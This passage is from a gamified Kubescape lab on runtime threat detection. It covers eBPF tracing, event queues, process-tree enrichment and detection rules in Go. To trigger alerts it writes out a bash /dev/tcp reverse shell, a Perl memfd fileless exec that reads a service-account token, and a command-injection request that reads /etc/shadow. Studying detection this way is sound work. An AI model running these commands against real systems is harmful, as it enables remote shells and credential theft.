func (e *DatasourceEvent) GetExePath() string {
    switch e.EventType {
    case ExecveEventType, ...:
        exepath, _ := e.getFieldAccessor("exepath").String(e.Data)
        return exepath
    }
}

This is the value that R1005 will check against event.exepath.contains('memfd').
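To see the shape of that check, here is a plain-Go approximation of the predicate. The real rule is a CEL expression, not Go; the /proc/self/fd prefix test is our illustrative addition and not necessarily part of R1005:

```go
package main

import (
	"fmt"
	"strings"
)

// isFilelessExec approximates the R1005 idea in plain Go. The real check
// is a CEL expression over event.exepath, shown in this lesson as
// event.exepath.contains('memfd').
func isFilelessExec(exepath string) bool {
	return strings.Contains(exepath, "memfd") ||
		strings.HasPrefix(exepath, "/proc/self/fd/")
}

func main() {
	for _, p := range []string{"/usr/bin/cat", "/proc/self/fd/3", "memfd:pwned"} {
		fmt.Println(p, isFilelessExec(p))
	}
	// /usr/bin/cat false
	// /proc/self/fd/3 true
	// memfd:pwned true
}
```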

Bonus Quest: The Reverse Shell Serpent

The Reverse Shell Serpent

A different monster lurks in the Scribe's Chamber. The Reverse Shell Serpent slithers through bash redirections that look innocent to simple process monitors --- but the Scribe's arg parser sees everything.

Before we hunt the Serpent, look at how the trace_exec gadget chains its operators. Each operator runs in priority order, transforming the raw eBPF data before the next one sees it:

The ExecOperator at priority 1 transforms raw bytes into structured data before the eventOperator at priority 50000 copies and dispatches the event.

Source code of exec.go

pkg/containerwatcher/v2/tracers/exec.go:56-69

et.gadgetCtx = gadgetcontext.New(ctx, execImageName,
    gadgetcontext.WithDataOperators(
        et.kubeManager,            // K8s metadata
        ocihandler.OciHandler,     
        NewExecOperator(),         // priority 1: parse args    
        et.eventOperator(),        // priority 50000: dispatch  
    ),
)

Lower priority runs first so the Scribe always finishes parsing before the Messenger dispatches.
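The ordering can be modeled with a toy operator chain (operator, runChain, and the transforms are ours, not Inspektor Gadget's API): sort by priority, then apply each transform in turn.

```go
package main

import (
	"fmt"
	"sort"
)

// operator carries a priority and a transform; lower priority runs first,
// so the parser (priority 1) always precedes the dispatcher (priority 50000).
type operator struct {
	name     string
	priority int
	apply    func(string) string
}

// runChain sorts operators by priority and threads the event through each.
func runChain(ops []operator, event string) string {
	sort.Slice(ops, func(i, j int) bool { return ops[i].priority < ops[j].priority })
	for _, op := range ops {
		event = op.apply(event)
	}
	return event
}

func main() {
	ops := []operator{
		{"dispatch", 50000, func(e string) string { return e + " -> dispatched" }},
		{"parse", 1, func(e string) string { return "parsed(" + e + ")" }},
	}
	fmt.Println(runChain(ops, "raw")) // parsed(raw) -> dispatched
}
```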

Challenge: Catch a live reverse shell from inside a pod.

Create the three terminals for the rev shell

You need three terminals. Terminal 1 watches the node-agent alerts. Terminal 2 catches the shell. Terminal 3 fires the exploit.

# Terminal 1 β€” watch alerts in real time
kubectl logs -n kubescape -l app=node-agent -c node-agent -f \
  | jq -r 'select(.RuleID) | "\(.BaseRuntimeMetadata.timestamp) \(.RuleID) \(.message)"'

Start a listener on the dev machine (Terminal 2):

MY_IP=$(hostname -I | awk '{print $1}')
echo "Listening on $MY_IP:4444 ..."
nc -lvnp 4444

In Terminal 3, create the reverse shell from the Redis pod:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')
MY_IP=$(hostname -I | awk '{print $1}')
kubectl -n redis exec "$REDIS_POD" -- \
  bash -c "bash -i >& /dev/tcp/$MY_IP/4444 0>&1"

In Terminal 2 you should see a bash prompt arrive --- you are now inside the Redis container. Try hostname, id, cat /var/run/secrets/kubernetes.io/serviceaccount/token. You are now watching what an attacker executes after gaining a foothold.

In Terminal 1, R0001 fires immediately (amongst many R0003 alerts):

2026-03-13T19:15:14.054563529Z R0001 Unexpected process launched: bash with PID 124110
2026-03-13T19:15:14.049730148Z R0001 Unexpected process launched: bash with PID 124104
2026-03-13T19:16:30.665779638Z R0001 Unexpected process launched: hostname with PID 126718 #assuming you ran `hostname` inside the caught shell

What comes from Inspector Gadget (the eBPF tracer):

kubectl exec uses the container runtime (runc) to call execve("/usr/bin/bash", ["/usr/bin/bash", "-c", "bash -i >& /dev/tcp/172.16.0.2/4444 0>&1"]) inside the container. The eBPF probe writes the argv array into a ring buffer as null-terminated bytes:

  Raw eBPF buffer (args field):
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”¬β”€β”€β”€β”€β”¬β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”
  β”‚ /usr/bin/bash β”‚\0β”‚ -c β”‚\0β”‚ bash -i >& /dev/tcp/172.16.0.2/4444 0>&1     β”‚\0β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”΄β”€β”€β”€β”€β”΄β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”˜
    arg[0]              arg[1]   arg[2] ← the FULL C2 target is right here

Read the chain of alerts for the full C2 evidence, observing how the pcomm (parent command) tells you where the process was spawned/forked from:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=100  | jq 'select(.RuleID == "R0001") '


Room 4: The Hall of Time

A vast hall dominated by a mechanical clock. Events arrive from every direction --- exec, open, DNS, HTTP --- each stamped with nanosecond precision. A brass sign reads: "None shall pass out of turn."

  exec events ──┐
  open events ───     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  dns events  ──┼────>β”‚  OrderedEventQueue (min-heap)     β”‚
  net events  ───     β”‚                                   β”‚
  fork events β”€β”€β”˜     β”‚  priority = timestamp.UnixNano()  β”‚
                      β”‚                                   β”‚
                      β”‚  β”Œβ”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”        β”‚
                      β”‚  β”‚t=1β”‚t=2β”‚t=3β”‚t=4β”‚t=5β”‚...β”‚        β”‚
                      β”‚  β””β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”˜        β”‚
                      β”‚     β–² oldest pops first           β”‚
                      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                     β”‚
                      every 50ms β”€β”€β”€β”€β”˜
                                     β”‚
                      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                      β”‚  eventProcessingLoop (ticker)       β”‚
                      β”‚  processQueueBatch() β†’ enrichAndPro β”‚
                      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The OrderedEventQueue is keyed by nanosecond wall-clock timestamps. Events from different eBPF probes can arrive out of order; the queue re-orders them.
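The re-ordering can be sketched with Go's container/heap, using the timestamp as the priority key. The event fields and helper names here are a minimal stand-in for the real enriched events:

```go
package main

import (
	"container/heap"
	"fmt"
)

// event is a minimal stand-in for the enriched events; the real queue
// keys on the nanosecond timestamp in just the same way.
type event struct {
	ts   int64 // nanoseconds
	kind string
}

// eventHeap implements heap.Interface, ordered by timestamp (min-heap).
type eventHeap []event

func (h eventHeap) Len() int           { return len(h) }
func (h eventHeap) Less(i, j int) bool { return h[i].ts < h[j].ts }
func (h eventHeap) Swap(i, j int)      { h[i], h[j] = h[j], h[i] }
func (h *eventHeap) Push(x any)        { *h = append(*h, x.(event)) }
func (h *eventHeap) Pop() any {
	old := *h
	x := old[len(old)-1]
	*h = old[:len(old)-1]
	return x
}

// add and next wrap the heap package so callers never touch it directly.
func (h *eventHeap) add(e event) { heap.Push(h, e) }
func (h *eventHeap) next() event { return heap.Pop(h).(event) }

func main() {
	h := &eventHeap{}
	// Events arrive out of order from different probes...
	h.add(event{ts: 300, kind: "open"})
	h.add(event{ts: 100, kind: "exec"})
	h.add(event{ts: 200, kind: "dns"})
	// ...but always pop oldest first.
	for h.Len() > 0 {
		fmt.Println(h.next().kind)
	}
	// exec
	// dns
	// open
}
```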

The eventProcessingLoop in container_watcher.go drains the queue every 50 milliseconds. If the queue fills up, a fullQueueAlert channel triggers an immediate drain.
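A self-contained sketch of that loop shape follows; miniQueue, drainLoop, and the channel names are ours, while the real logic lives in container_watcher.go:

```go
package main

import (
	"fmt"
	"sort"
	"time"
)

// miniQueue stands in for the OrderedEventQueue: push in any order,
// drain oldest-first.
type miniQueue struct{ ts []int64 }

func (q *miniQueue) push(t int64) { q.ts = append(q.ts, t) }

// drain returns everything queued so far, oldest first.
func (q *miniQueue) drain() []int64 {
	sort.Slice(q.ts, func(i, j int) bool { return q.ts[i] < q.ts[j] })
	out := q.ts
	q.ts = nil
	return out
}

// drainLoop mirrors the described pattern: drain on a 50ms tick, or
// immediately when the overflow channel fires.
func drainLoop(q *miniQueue, full, stop <-chan struct{}, process func([]int64)) {
	tick := time.NewTicker(50 * time.Millisecond)
	defer tick.Stop()
	for {
		select {
		case <-tick.C: // regular 50ms batch
		case <-full: // queue filling up: drain right away
		case <-stop:
			return
		}
		process(q.drain())
	}
}

func main() {
	q := &miniQueue{}
	for _, t := range []int64{300, 100, 200} {
		q.push(t)
	}
	stop := make(chan struct{})
	got := make(chan []int64, 1)
	go drainLoop(q, nil, stop, func(batch []int64) {
		if len(batch) > 0 {
			got <- batch
		}
	})
	fmt.Println(<-got) // oldest first: [100 200 300]
	close(stop)
}
```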

Quest: The Two Clocks --- Why R0001 Arrives 10-22 Seconds Before R0003

the two clock side quest

For our fileless exec, the execve("/proc/self/fd/3") event enters the queue with its nanosecond timestamp and waits at most 50ms before being popped. Fire the (pseudo) exploit again and watch the timestamps closely:

Recreate the triggers of the pseudo attack
# Terminal 1 β€” watch alerts, capture timestamps
kubectl logs -n kubescape -l app=node-agent -c node-agent -f \
  | jq -r 'select(.RuleID) | "\(.BaseRuntimeMetadata.timestamp) \(.RuleID) \(.message)"'
# Terminal 2 β€” fire the fileless exec
kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'

You'll see something like:

17:12:18.988Z  R0001  Unexpected process launched              ← instant
17:12:18.987Z  R0006  Unexpected service account token access  ← instant
17:12:18.989Z  R0001  Unexpected process launched              ← instant
17:12:23.514Z  R1005  Fileless execution detected              ← instant
17:12:40.344Z  R0003  Syscalls Anomalies in container          ← ~9-22s later!
17:12:40.332Z  R0003  Syscalls Anomalies in container          ← ~9-22s later!
17:12:40.364Z  R0003  Syscalls Anomalies in container          ← ~9-22s later!

Why the gap? The two alert types use completely different eBPF gadgets with different collection models:

        trace_exec (R0001, R1005)                                    advise_seccomp (R0003)                                                             
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                                     
    β”‚ model: per-event                     β”‚                     β”‚ model: periodic batch                    β”‚                                     
    β”‚                                      β”‚                     β”‚                                          β”‚                                     
    β”‚                                      β”‚                     β”‚ syscalls accumulate in eBPF map (bitmap) β”‚                                     
    β”‚                                      β”‚                     β”‚   ...up to 30 seconds...                 β”‚                                     
    β”‚                                      β”‚                     β”‚ map-fetch-interval fires                 β”‚                                     
    β”‚ execve fires                         β”‚                     β”‚   ↓ flush entire bitmap                  β”‚                                     
    β”‚   ↓ immediate                        β”‚                     β”‚                                          β”‚                                     
    β”‚ Subscribe callback                   β”‚                     β”‚ Subscribe callback                       β”‚
    β”‚   ↓ <1ms                             β”‚                     β”‚   ↓ decode 256-byte map                  β”‚                                     
    β”‚ OrderedEventQueue                    β”‚                     β”‚ OrderedEventQueue                        β”‚                                     
    β”‚   ↓ ≀50ms                            β”‚                     β”‚   ↓ ≀50ms                                β”‚
    β”‚ Alert fires                          β”‚                     β”‚ Alert fires                              β”‚                                     
    β”‚                                      β”‚                     β”‚                                          β”‚
    β”‚ total: ~100ms                        β”‚                     β”‚ total: up to ~30s                        β”‚                                     
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The SyscallTracer loads the advise_seccomp gadget with a hardcoded 30-second map-fetch interval. Instead of emitting one event per syscall (which would be millions per second), it accumulates a 256-byte bitmap of which syscalls were used, then flushes the entire bitmap to userspace every 30 seconds.

Source code -- SyscallTracer uses 30s batch interval

pkg/containerwatcher/v2/tracers/syscall.go:68-71

params := map[string]string{
    "operator.oci.ebpf.map-fetch-count":    "0",
    "operator.oci.ebpf.map-fetch-interval": "30s",  
    "operator.LocalManager.host":           "true",
}

Compare with the ExecTracer which uses real-time Subscribe callbacks (no batching):

pkg/containerwatcher/v2/tracers/exec.go:113-116

d.Subscribe(func(source datasource.DataSource, data datasource.Data) error {
    et.callback(&utils.DatasourceEvent{...})  // fires per-event
    return nil
}, opPriority)

You now understand why the Timekeeper's clock has two speeds. The Exec Scribes deliver scrolls the instant they are written. The Syscall Scribes gather a day's worth of tallies and deliver them in a single sack every 30 seconds. Both enter the Hall of Time, but one arrives much later than the other.
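The bitmap flush can be sketched in a few lines of Go. This is a minimal illustration, not the gadget's actual decoder: the `syscallNames` table is a tiny hypothetical subset of the real syscall table, and `decodeBitmap` just shows the bit-per-syscall idea behind the 256-byte map.

```go
package main

import "fmt"

// Hypothetical subset of the syscall-number-to-name table; the real
// gadget covers the full architecture-specific syscall table.
var syscallNames = map[int]string{0: "read", 1: "write", 59: "execve", 279: "memfd_create"}

// decodeBitmap walks a 256-byte bitmap (one bit per syscall number, so
// 2048 syscalls) and returns the names of the syscalls whose bits are
// set -- the shape of what gets flushed to userspace each interval.
func decodeBitmap(bm [256]byte) []string {
	var used []string
	for nr := 0; nr < len(bm)*8; nr++ {
		if bm[nr/8]&(1<<(nr%8)) != 0 {
			if name, ok := syscallNames[nr]; ok {
				used = append(used, name)
			} else {
				used = append(used, fmt.Sprintf("syscall_%d", nr))
			}
		}
	}
	return used
}

func main() {
	var bm [256]byte
	bm[59/8] |= 1 << (59 % 8)     // execve observed
	bm[279/8] |= 1 << (279 % 8)   // memfd_create observed
	fmt.Println(decodeBitmap(bm)) // [execve memfd_create]
}
```

One bit per syscall is why the batch model is so cheap: a container can make millions of syscalls in 30 seconds, yet the flush is always 256 bytes.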

Room 5 -- The Loremaster's Study


An ancient sage sits surrounded by floating crystal orbs, each containing the family tree of a running process. When an event arrives, the Loremaster traces its lineage back to the container's init process. The event enters as a bare fact; it leaves as a story.

  OrderedEventQueue                         EventEnricher
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     enrichAndProcess    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ EventEntry    β”‚ ───────────────────>    β”‚ EnrichedEvent {              β”‚
  β”‚   event       β”‚                         β”‚   Event:       <original>    β”‚
  β”‚   containerID β”‚                         β”‚   ProcessTree: redis-server  β”‚
  β”‚   processID   β”‚                         β”‚                └─ perl       β”‚
  β”‚   timestamp   β”‚                         β”‚                   └─ cat(3)  β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                         β”‚   ContainerID: "9cd796..."   β”‚
                                            β”‚   Timestamp:   <ns>          β”‚
                                            β”‚   PID:         51120         β”‚
                                            β”‚ }                            β”‚
                                            β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                                           β”‚
                                          β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                                          β”‚                β”‚                β”‚
                                          β–Ό                β–Ό                β–Ό
                                     ProfileMgr      RuleManager      MalwareMgr
                                     (Room 6)        (Room 8)         (signatures)

The EventEnricher does two things:

  1. Reports the event to the process tree manager --- for exec events, this updates the in-memory process tree with the new process
  2. Retrieves the container's process tree --- for our Redis exploit, this produces: redis-server β†’ perl β†’ cat (execve from /proc/self/fd/3)

The result is an EnrichedEvent that carries the original event, the process tree, container ID, timestamp, and PID.

Source code -- EventEnricher.EnrichEvents builds the process tree

pkg/containerwatcher/v2/event_enricher.go:28-54

func (ee *EventEnricher) EnrichEvents(entry EventEntry) *ebpfevents.EnrichedEvent {
    var processTree apitypes.Process
    // eventType and event below are derived from entry (abbreviated in this excerpt)

    if isProcessTreeEvent(eventType) { // exec, fork, exit are process tree events
        ee.processTreeManager.ReportEvent(eventType, event)
        processTree, _ = ee.processTreeManager.GetContainerProcessTree(
            entry.ContainerID, entry.ProcessID, false)
    }

    return &ebpfevents.EnrichedEvent{
        Event:       event,
        ProcessTree: processTree,
        ContainerID: entry.ContainerID,
        Timestamp:   entry.Timestamp,
        PID:         entry.ProcessID,
    }
}

The Dispatch --- Fan-Out to Handlers

After enrichment, the event enters the worker pool and is dispatched by EventHandlerFactory.ProcessEvent() to all handlers registered for ExecveEventType:

  enrichedEvent ──> workerPool.Invoke() ──> ProcessEvent()
                                                β”‚
                    handlers[ExecveEventType] = [
                      containerProfileManager,  ← Room 6 (records "normal")
                      ruleManager,              ← Room 8 (evaluates R1005)
                      malwareManager,           ← signature scan
                      metrics,                  ← prometheus counters
                      rulePolicy                ← policy validation
                    ]

All five handlers receive the same EnrichedEvent. The profile manager records it (if still learning). The rule manager judges it (if learning is done). Both see the same exepath: "/proc/self/fd/3".

Source code -- Handler registration for exec events

pkg/containerwatcher/v2/event_handler_factory.go:224

ehf.handlers[utils.ExecveEventType] = []Manager{
    containerProfileManager, ruleManager, malwareManager, metrics, rulePolicy,
}

ProcessEvent() iterates handlers and calls ReportEnrichedEvent() on each:

for _, handler := range handlers {
    if enrichedHandler, ok := handler.(EnrichedEventReceiver); ok {
        enrichedHandler.ReportEnrichedEvent(enrichedEvent)
    }
}
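The fan-out hinges on an optional-interface type assertion: any registered handler may implement the receiver interface, and only those that do get the event. Here is a self-contained sketch of that pattern, with stand-in types whose names are assumed from the excerpts above:

```go
package main

import "fmt"

// Minimal stand-ins for the real types (names assumed from the excerpts).
type EnrichedEvent struct{ ExePath string }

type Manager interface{ Name() string }

// Only handlers implementing this optional interface receive enriched
// events -- this is what the type assertion in ProcessEvent() checks.
type EnrichedEventReceiver interface {
	ReportEnrichedEvent(e *EnrichedEvent)
}

type profileRecorder struct{}

func (profileRecorder) Name() string { return "profileManager" }
func (profileRecorder) ReportEnrichedEvent(e *EnrichedEvent) {
	fmt.Println("profileManager records", e.ExePath)
}

type metricsOnly struct{} // registered, but not an EnrichedEventReceiver

func (metricsOnly) Name() string { return "metrics" }

// dispatch delivers the same event to every handler that opts in.
func dispatch(handlers []Manager, e *EnrichedEvent) int {
	delivered := 0
	for _, h := range handlers {
		if r, ok := h.(EnrichedEventReceiver); ok {
			r.ReportEnrichedEvent(e)
			delivered++
		}
	}
	return delivered
}

func main() {
	n := dispatch([]Manager{profileRecorder{}, metricsOnly{}},
		&EnrichedEvent{ExePath: "/proc/self/fd/3"})
	fmt.Println("delivered to", n, "handlers") // delivered to 1 handlers
}
```

The design means new handlers can be registered without touching the dispatch loop; opting into enriched events is just a matter of implementing the interface.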

Quest: See the process tree in the alert

After running the fileless exec from Unit 1, check the alert JSON:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=2000 | grep "R1005" | head -1 | python3 -m json.tool

    "RuntimeProcessDetails": {
        "processTree": {
            "pid": 25489,
            "cmdline": "/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token",
            "comm": "3",
            "ppid": 9806,
            "pcomm": "containerd-shim",
            "uid": 999,
            "gid": 999,
            "path": "memfd:pwned"
        },

Side Quest: The Command Injector

A trapped chest sits in the corner of the Study. Its lock accepts any string β€” even one laced with poison.


Challenge: Deploy a vulnerable webapp, inject `; cat /etc/shadow`, and watch the Loremaster's process tree expose the attack chain.

Install the infamous webapp

Step 1 β€” Apply the ApplicationProfile (SBoB)

Instead of waiting for a learning period, we supply a pre-built ApplicationProfile. The profile must exist before the pod starts so the node-agent finds it.

kubectl create namespace webapp

kubectl apply -f - <<'EOF'
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: webapp-profile-wildcard
  namespace: webapp
spec:
  architectures:
  - amd64
  containers:
  - capabilities:
    - CAP_DAC_OVERRIDE
    - CAP_SETGID
    - CAP_SETUID
    endpoints: null
    execs:
    - args:
      - /usr/bin/dirname
      - /var/run/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/bin/dirname
      - /var/lock/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/bin/dirname
      - /var/log/apache2
      path: /usr/bin/dirname
    - args:
      - /bin/mkdir
      - -p
      - /var/run/apache2
      path: /bin/mkdir
    - args:
      - /usr/local/bin/apache2-foreground
      path: /usr/local/bin/apache2-foreground
    - args:
      - /bin/rm
      - -f
      - /var/run/apache2/apache2.pid
      path: /bin/rm
    - args:
      - /bin/mkdir
      - -p
      - /var/log/apache2
      path: /bin/mkdir
    - args:
      - /bin/mkdir
      - -p
      - /var/lock/apache2
      path: /bin/mkdir
    - args:
      - /usr/sbin/apache2
      - -DFOREGROUND
      path: /usr/sbin/apache2
    - args:
      - /usr/local/bin/docker-php-entrypoint
      - apache2-foreground
      path: /usr/local/bin/docker-php-entrypoint
    - args:
      - /usr/bin/touch
      - '*'
      path: /usr/bin/touch
    identifiedCallStacks: null
    imageID: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    imageTag: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    name: mywebapp-app
    opens:
    - flags:
      - O_APPEND
      - O_CLOEXEC
      - O_CREAT
      - O_DIRECTORY
      - O_EXCL
      - O_NONBLOCK
      - O_RDONLY
      - O_RDWR
      - O_WRONLY
      path: //var/www/html/*
    rulePolicies: {}
    seccompProfile:
      spec:
        defaultAction: ""
    syscalls:
    - accept4
    - access
    - arch_prctl
    - bind
    - brk
    - capget
    - capset
    - chdir
    - chmod
    - clone
    - close
    - close_range
    - connect
    - dup2
    - dup3
    - epoll_create1
    - epoll_ctl
    - epoll_pwait
    - execve
    - exit
    - exit_group
    - faccessat2
    - fcntl
    - fstat
    - fstatfs
    - futex
    - getcwd
    - getdents64
    - getegid
    - geteuid
    - getgid
    - getpgrp
    - getpid
    - getppid
    - getrandom
    - getsockname
    - gettid
    - getuid
    - ioctl
    - listen
    - lseek
    - mkdir
    - mmap
    - mprotect
    - munmap
    - nanosleep
    - newfstatat
    - openat
    - openat2
    - pipe
    - prctl
    - prlimit64
    - read
    - recvfrom
    - recvmsg
    - rename
    - rt_sigaction
    - rt_sigprocmask
    - rt_sigreturn
    - select
    - sendto
    - set_robust_list
    - set_tid_address
    - setgid
    - setgroups
    - setsockopt
    - setuid
    - sigaltstack
    - socket
    - stat
    - statfs
    - statx
    - sysinfo
    - tgkill
    - times
    - tkill
    - umask
    - uname
    - unknown
    - unlinkat
    - wait4
    - write
status: {}
EOF

Notice what's in the profile: dirname, mkdir, rm, touch, apache2, docker-php-entrypoint β€” the normal apache startup sequence. Crucially, sh and cat are not in the execs list. Any process outside this list triggers R0001.
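The core of the R0001 check is simple: is the observed exec in the profile's execs list? A minimal sketch, assuming a simplified `execEntry` shape (the real matching also considers args and wildcard entries):

```go
package main

import "fmt"

// execEntry mirrors the shape of one item in the profile's execs list.
type execEntry struct {
	Path string
	Args []string
}

// isAllowed reports whether an observed exec path appears in the
// profile. Simplified: real matching also compares args and wildcards.
func isAllowed(profile []execEntry, path string) bool {
	for _, e := range profile {
		if e.Path == path {
			return true
		}
	}
	return false
}

func main() {
	profile := []execEntry{
		{Path: "/usr/bin/dirname"},
		{Path: "/bin/mkdir"},
		{Path: "/usr/sbin/apache2"},
	}
	fmt.Println(isAllowed(profile, "/usr/sbin/apache2")) // true: normal startup
	fmt.Println(isAllowed(profile, "/bin/cat"))          // false: R0001 fires
}
```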

Step 2 β€” Deploy the webapp

Now that the profile exists, deploy the webapp. The kubescape.io/user-defined-profile: webapp-profile-wildcard label tells the node-agent to use our pre-built SBoB β€” detection starts the moment the container is ready.

kubectl apply -f - <<'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  replicas: 1
  selector:
    matchLabels:
      app.kubernetes.io/name: mywebapp
      app.kubernetes.io/instance: webapp
  template:
    metadata:
      labels:
        app.kubernetes.io/name: mywebapp
        app.kubernetes.io/instance: webapp
        kubescape.io/user-defined-profile: webapp-profile-wildcard
    spec:
      serviceAccountName: default
      containers:
        - name: mywebapp-app
          image: "ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b"
          imagePullPolicy: Always
          ports:
            - name: http
              containerPort: 80
              protocol: TCP
          volumeMounts:
            - mountPath: /host/var/log
              name: nodelog
      volumes:
        - name: nodelog
          hostPath:
            path: /var/log
---
apiVersion: v1
kind: Service
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  type: ClusterIP
  ports:
    - port: 8080
      targetPort: 80
      protocol: TCP
      name: http
  selector:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
EOF

Wait for the pod to be ready:

kubectl -n webapp wait --for=condition=ready pod -l app.kubernetes.io/name=mywebapp --timeout=120s

Step 3 β€” Inject the command

The webapp has a ping feature that passes user input directly to a shell. From inside the cluster, inject ; cat /etc/shadow:

sudo kill -9 $(sudo lsof -t -i :8080) 2>/dev/null || true
kubectl --namespace webapp port-forward $(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}") 8080:80 &
curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20/etc/shadow"

You should not yet see the contents of /etc/shadow in the response: the injected command ran as the www user, which doesn't have permission to read /etc/shadow.

Step 4 β€” Read the alert

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=5000  | grep -E "R0001|R0010" | jq

Now let's grab /etc/shadow in a more brutal way:

WEBAPP_POD=$(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}")

kubectl exec -n webapp $WEBAPP_POD -- sh -c 'cat /etc/shadow'

Look for two rules firing:

  • R0001 β€” Unexpected process launched: cat was never seen during learning, so it's unexpected
  • R0010 β€” Unexpected sensitive file access: /etc/shadow is a sensitive path that is not under /var/www/html

So for /etc/shadow we have a predefined rule that tells us this is a sensitive file and cat has no business reading it. In the injection case, however, it is the process tree reconstruction that tells us an Apache server spawning cat is malicious. View the RuntimeProcessDetails.processTree:

   "RuntimeProcessDetails": {
    "processTree": {
      "pid": 52414,
      "cmdline": "apache2 -DFOREGROUND",
      "comm": "apache2",
      "ppid": 52187,
      "pcomm": "containerd-shim",
      "uid": 0,
      "gid": 0,
      "startTime": "0001-01-01T00:00:00Z",
      "cwd": "/var/www/html",
      "path": "/usr/sbin/apache2",
      "childrenMap": {
